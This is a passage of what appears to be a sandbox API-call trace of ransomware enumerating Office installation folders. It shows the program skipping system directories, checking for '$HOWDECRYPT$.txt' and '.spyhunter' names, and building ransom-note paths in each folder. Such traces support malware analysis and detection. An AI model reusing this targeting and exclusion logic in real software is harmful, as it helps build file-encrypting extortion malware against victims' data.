25 [0088.085] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\.") returned 94 [0088.085] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0088.085] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0088.085] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0088.085] lstrlenW (lpString="Windows") returned 7 [0088.085] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0088.085] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.085] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0088.085] lstrlenW (lpString="System Volume Information") returned 25 [0088.085] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\..") returned 95 [0088.085] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0088.086] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0088.086] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0088.086] lstrcmpiW (lpString1="Proof.XML", lpString2="Windows") returned -1 [0088.086] lstrlenW (lpString="Windows") returned 7 [0088.086] lstrcmpiW (lpString1="Proof.XML", lpString2="$Recycle.bin") returned 1 [0088.086] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.086] lstrcmpiW (lpString1="Proof.XML", lpString2="System Volume Information") returned -1 [0088.086] lstrlenW (lpString="System Volume Information") returned 25 [0088.086] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML") returned 102 [0088.086] StrStrIW (lpFirst="Proof.XML", lpSrch=".spyhunter") returned 0x0 [0088.086] lstrcmpW (lpString1="Proof.XML", lpString2="$HOWDECRYPT$.txt") returned 1 [0088.086] lstrcmpW (lpString1="Proof.XML", lpString2="_uninstalling_.png") returned 1 [0088.086] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML") returned 102 [0088.086] GetProcessHeap () returned 0x2c0000 [0088.086] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x10e) returned 0x3792a0 [0088.086] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x37a750, Size=0xbd8) returned 0x37a750 [0088.086] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 0 [0088.086] FindClose (in: hFindFile=0x335fe0 | out: hFindFile=0x335fe0) returned 1 [0088.087] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\$HOWDECRYPT$.txt") returned 109 [0088.087] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\$HOWDECRYPT$.txt") returned 109 [0088.087] GetProcessHeap () returned 0x2c0000 [0088.089] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x11c) returned 0x37b480 [0088.089] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x37a750, Size=0xbe0) returned 0x37a750 [0088.089] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0088.090] lstrcmpiW (lpString1="Proofing.en-us", lpString2="Windows") returned -1 [0088.090] lstrlenW (lpString="Windows") returned 7 [0088.090] lstrcmpiW (lpString1="Proofing.en-us", lpString2="$Recycle.bin") returned 1 [0088.090] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.090] lstrcmpiW (lpString1="Proofing.en-us", lpString2="System Volume Information") returned -1 [0088.090] lstrlenW (lpString="System Volume Information") returned 25 [0088.090] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us") returned 98 [0088.090] lstrcmpW (lpString1="Proofing.en-us", lpString2=".") returned 1 [0088.090] lstrcmpW (lpString1="Proofing.en-us", lpString2="..") returned 1 [0088.090] GetProcessHeap () returned 0x2c0000 [0088.090] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x3867e8 [0088.090] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\*") returned 100 [0088.090] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\*", lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 0x335fe0 [0088.091] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0088.091] lstrlenW (lpString="Windows") returned 7 [0088.091] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0088.091] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.091] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0088.091] lstrlenW (lpString="System Volume Information") returned 25 [0088.092] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\.") returned 100 [0088.092] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0088.092] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0088.092] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0088.092] lstrlenW (lpString="Windows") returned 7 [0088.092] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0088.092] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.092] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0088.092] lstrlenW (lpString="System Volume Information") returned 25 [0088.092] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\..") returned 101 [0088.092] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0088.162] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0088.162] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0088.162] lstrcmpiW (lpString1="Proofing.XML", lpString2="Windows") returned -1 [0088.162] lstrlenW (lpString="Windows") returned 7 [0088.162] lstrcmpiW (lpString1="Proofing.XML", lpString2="$Recycle.bin") returned 1 [0088.162] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.162] lstrcmpiW (lpString1="Proofing.XML", lpString2="System Volume Information") returned -1 [0088.162] lstrlenW (lpString="System Volume Information") returned 25 [0088.162] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML") returned 111 [0088.162] StrStrIW (lpFirst="Proofing.XML", lpSrch=".spyhunter") returned 0x0 [0088.163] lstrcmpW (lpString1="Proofing.XML", lpString2="$HOWDECRYPT$.txt") returned 1 [0088.163] lstrcmpW (lpString1="Proofing.XML", lpString2="_uninstalling_.png") returned 1 [0088.163] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML") returned 111 [0088.163] GetProcessHeap () returned 0x2c0000 [0088.163] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x120) returned 0x37b480 [0088.163] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x37a750, Size=0xbd8) returned 0x37a750 [0088.163] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0088.163] lstrcmpiW (lpString1="SETUP.XML", lpString2="Windows") returned -1 [0088.163] lstrlenW (lpString="Windows") returned 7 [0088.163] lstrcmpiW (lpString1="SETUP.XML", lpString2="$Recycle.bin") returned 1 [0088.163] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.163] lstrcmpiW (lpString1="SETUP.XML", lpString2="System Volume Information") returned -1 [0088.163] lstrlenW (lpString="System Volume Information") returned 25 [0088.163] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML") returned 108 [0088.163] StrStrIW (lpFirst="SETUP.XML", lpSrch=".spyhunter") returned 0x0 [0088.163] lstrcmpW (lpString1="SETUP.XML", lpString2="$HOWDECRYPT$.txt") returned 1 [0088.163] lstrcmpW (lpString1="SETUP.XML", lpString2="_uninstalling_.png") returned 1 [0088.163] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML") returned 108 [0088.163] GetProcessHeap () returned 0x2c0000 [0088.163] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x11a) returned 0x37b5a8 [0088.163] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x37a750, Size=0xbe0) returned 0x37a750 [0088.163] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 0 [0088.163] FindClose (in: hFindFile=0x335fe0 | out: hFindFile=0x335fe0) returned 1 [0088.172] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\$HOWDECRYPT$.txt") returned 115 [0088.172] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\$HOWDECRYPT$.txt") returned 115 [0088.172] GetProcessHeap () returned 0x2c0000 [0088.172] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x128) returned 0x3793b8 [0088.172] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x37a750, Size=0xbe8) returned 0x37a750 [0088.173] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0088.173] lstrcmpiW (lpString1="PROPLUSR", lpString2="Windows") returned -1 [0088.173] lstrlenW (lpString="Windows") returned 7 [0088.173] lstrcmpiW (lpString1="PROPLUSR", lpString2="$Recycle.bin") returned 1 [0088.173] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.173] lstrcmpiW (lpString1="PROPLUSR", lpString2="System Volume Information") returned -1 [0088.173] lstrlenW (lpString="System Volume Information") returned 25 [0088.173] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR") returned 92 [0088.173] lstrcmpW (lpString1="PROPLUSR", lpString2=".") returned 1 [0088.173] lstrcmpW (lpString1="PROPLUSR", lpString2="..") returned 1 [0088.173] GetProcessHeap () returned 0x2c0000 [0088.173] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x3867e8 [0088.173] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\*") returned 94 [0088.173] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\*", lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 0x335fe0 [0088.787] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0088.787] lstrlenW (lpString="Windows") returned 7 [0088.787] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0088.787] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.787] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0088.787] lstrlenW (lpString="System Volume Information") returned 25 [0088.787] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\.") returned 94 [0088.787] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0088.787] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0088.787] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0088.787] lstrlenW (lpString="Windows") returned 7 [0088.787] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0088.787] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.787] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0088.787] lstrlenW (lpString="System Volume Information") returned 25 [0088.787] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\..") returned 95 [0088.787] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0088.787] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0088.787] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0088.787] lstrcmpiW (lpString1="ProPlusrWW.XML", lpString2="Windows") returned -1 [0088.787] lstrlenW (lpString="Windows") returned 7 [0088.787] lstrcmpiW (lpString1="ProPlusrWW.XML", lpString2="$Recycle.bin") returned 1 [0088.787] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.787] lstrcmpiW (lpString1="ProPlusrWW.XML", lpString2="System Volume Information") returned -1 [0088.787] lstrlenW (lpString="System Volume Information") returned 25 [0088.787] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML") returned 107 [0088.787] StrStrIW (lpFirst="ProPlusrWW.XML", lpSrch=".spyhunter") returned 0x0 [0088.787] lstrcmpW (lpString1="ProPlusrWW.XML", lpString2="$HOWDECRYPT$.txt") returned 1 [0088.787] lstrcmpW (lpString1="ProPlusrWW.XML", lpString2="_uninstalling_.png") returned 1 [0088.787] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML") returned 107 [0088.787] GetProcessHeap () returned 0x2c0000 [0088.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x118) returned 0x375dc8 [0088.788] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x37a750, Size=0xbd0) returned 0x37a750 [0088.788] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0088.788] lstrcmpiW (lpString1="SETUP.XML", lpString2="Windows") returned -1 [0088.788] lstrlenW (lpString="Windows") returned 7 [0088.788] lstrcmpiW (lpString1="SETUP.XML", lpString2="$Recycle.bin") returned 1 [0088.788] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.788] lstrcmpiW (lpString1="SETUP.XML", lpString2="System Volume Information") returned -1 [0088.788] lstrlenW (lpString="System Volume Information") returned 25 [0088.788] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML") returned 102 [0088.788] StrStrIW (lpFirst="SETUP.XML", lpSrch=".spyhunter") returned 0x0 [0088.788] lstrcmpW (lpString1="SETUP.XML", lpString2="$HOWDECRYPT$.txt") returned 1 [0088.788] lstrcmpW (lpString1="SETUP.XML", lpString2="_uninstalling_.png") returned 1 [0088.788] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML") returned 102 [0088.788] GetProcessHeap () returned 0x2c0000 [0088.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x10e) returned 0x3792a0 [0088.788] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x37a750, Size=0xbd8) returned 0x37a750 [0088.788] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 0 [0088.788] FindClose (in: hFindFile=0x335fe0 | out: hFindFile=0x335fe0) returned 1 [0088.788] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\$HOWDECRYPT$.txt") returned 109 [0088.788] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\$HOWDECRYPT$.txt") returned 109 [0088.788] GetProcessHeap () returned 0x2c0000 [0088.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x11c) returned 0x37b5a8 [0088.788] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x37a750, Size=0xbe0) returned 0x37a750 [0088.790] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0088.790] lstrcmpiW (lpString1="Publisher.en-us", lpString2="Windows") returned -1 [0088.790] lstrlenW (lpString="Windows") returned 7 [0088.790] lstrcmpiW (lpString1="Publisher.en-us", lpString2="$Recycle.bin") returned 1 [0088.790] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.790] lstrcmpiW (lpString1="Publisher.en-us", lpString2="System Volume Information") returned -1 [0088.790] lstrlenW (lpString="System Volume Information") returned 25 [0088.790] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us") returned 99 [0088.790] lstrcmpW (lpString1="Publisher.en-us", lpString2=".") returned 1 [0088.790] lstrcmpW (lpString1="Publisher.en-us", lpString2="..") returned 1 [0088.790] GetProcessHeap () returned 0x2c0000 [0088.790] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x3867e8 [0088.791] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\*") returned 101 [0088.791] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\*", lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 0x335fe0 [0088.791] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0088.791] lstrlenW (lpString="Windows") returned 7 [0088.791] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0088.791] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.791] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0088.791] lstrlenW (lpString="System Volume Information") returned 25 [0088.792] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\.") returned 101 [0088.792] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0088.792] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0088.792] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0088.792] lstrlenW (lpString="Windows") returned 7 [0088.792] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0088.792] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.792] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0088.792] lstrlenW (lpString="System Volume Information") returned 25 [0088.792] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\..") returned 102 [0088.792] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0088.792] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0088.792] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0088.792] lstrcmpiW (lpString1="PublisherMUI.XML", lpString2="Windows") returned -1 [0088.792] lstrlenW (lpString="Windows") returned 7 [0088.792] lstrcmpiW (lpString1="PublisherMUI.XML", lpString2="$Recycle.bin") returned 1 [0088.792] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.792] lstrcmpiW (lpString1="PublisherMUI.XML", lpString2="System Volume Information") returned -1 [0088.792] lstrlenW (lpString="System Volume Information") returned 25 [0088.792] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML") returned 116 [0088.792] StrStrIW (lpFirst="PublisherMUI.XML", lpSrch=".spyhunter") returned 0x0 [0088.792] lstrcmpW (lpString1="PublisherMUI.XML", lpString2="$HOWDECRYPT$.txt") returned 1 [0088.793] lstrcmpW (lpString1="PublisherMUI.XML", lpString2="_uninstalling_.png") returned 1 [0088.793] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML") returned 116 [0088.793] GetProcessHeap () returned 0x2c0000 [0088.793] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x12a) returned 0x3793b8 [0088.793] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x37a750, Size=0xbe8) returned 0x37a750 [0088.793] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0088.793] lstrcmpiW (lpString1="SETUP.XML", lpString2="Windows") returned -1 [0088.793] lstrlenW (lpString="Windows") returned 7 [0088.793] lstrcmpiW (lpString1="SETUP.XML", lpString2="$Recycle.bin") returned 1 [0088.793] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.793] lstrcmpiW (lpString1="SETUP.XML", lpString2="System Volume Information") returned -1 [0088.793] lstrlenW (lpString="System Volume Information") returned 25 [0088.793] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML") returned 109 [0088.793] StrStrIW (lpFirst="SETUP.XML", lpSrch=".spyhunter") returned 0x0 [0088.793] lstrcmpW (lpString1="SETUP.XML", lpString2="$HOWDECRYPT$.txt") returned 1 [0088.793] lstrcmpW (lpString1="SETUP.XML", lpString2="_uninstalling_.png") returned 1 [0088.793] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML") returned 109 [0088.793] GetProcessHeap () returned 0x2c0000 [0088.793] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x11c) returned 0x37b6d0 [0088.793] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x37a750, Size=0xbf0) returned 0x37a750 [0088.793] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 0 [0088.793] FindClose (in: hFindFile=0x335fe0 | out: hFindFile=0x335fe0) returned 1 [0088.793] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\$HOWDECRYPT$.txt") returned 116 [0088.793] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\$HOWDECRYPT$.txt") returned 116 [0088.793] GetProcessHeap () returned 0x2c0000 [0088.793] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x12a) returned 0x3794f0 [0088.794] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x37a750, Size=0xbf8) returned 0x37d468 [0088.794] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0088.794] lstrcmpiW (lpString1="Setup.exe", lpString2="Windows") returned -1 [0088.794] lstrlenW (lpString="Windows") returned 7 [0088.794] lstrcmpiW (lpString1="Setup.exe", lpString2="$Recycle.bin") returned 1 [0088.794] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.794] lstrcmpiW (lpString1="Setup.exe", lpString2="System Volume Information") returned -1 [0088.794] lstrlenW (lpString="System Volume Information") returned 25 [0088.794] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Setup.exe") returned 93 [0088.794] StrStrIW (lpFirst="Setup.exe", lpSrch=".spyhunter") returned 0x0 [0088.794] lstrcmpW (lpString1="Setup.exe", lpString2="$HOWDECRYPT$.txt") returned 1 [0088.794] lstrcmpW (lpString1="Setup.exe", lpString2="_uninstalling_.png") returned 1 [0088.794] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Setup.exe") returned 93 [0088.794] GetProcessHeap () returned 0x2c0000 [0088.794] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xfc) returned 0x379628 [0088.794] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x37d468, Size=0xc00) returned 0x37d468 [0088.794] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0088.794] lstrcmpiW (lpString1="Visio.en-us", lpString2="Windows") returned -1 [0088.794] lstrlenW (lpString="Windows") returned 7 [0088.794] lstrcmpiW (lpString1="Visio.en-us", lpString2="$Recycle.bin") returned 1 [0088.794] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.794] lstrcmpiW (lpString1="Visio.en-us", lpString2="System Volume Information") returned 1 [0088.794] lstrlenW (lpString="System Volume Information") returned 25 [0088.794] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us") returned 95 [0088.794] lstrcmpW (lpString1="Visio.en-us", lpString2=".") returned 1 [0088.794] lstrcmpW (lpString1="Visio.en-us", lpString2="..") returned 1 [0088.794] GetProcessHeap () returned 0x2c0000 [0088.794] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x3867e8 [0088.794] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\*") returned 97 [0088.794] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\*", lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 0x335fe0 [0088.796] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0088.796] lstrlenW (lpString="Windows") returned 7 [0088.796] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0088.796] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.796] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0088.796] lstrlenW (lpString="System Volume Information") returned 25 [0088.796] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, 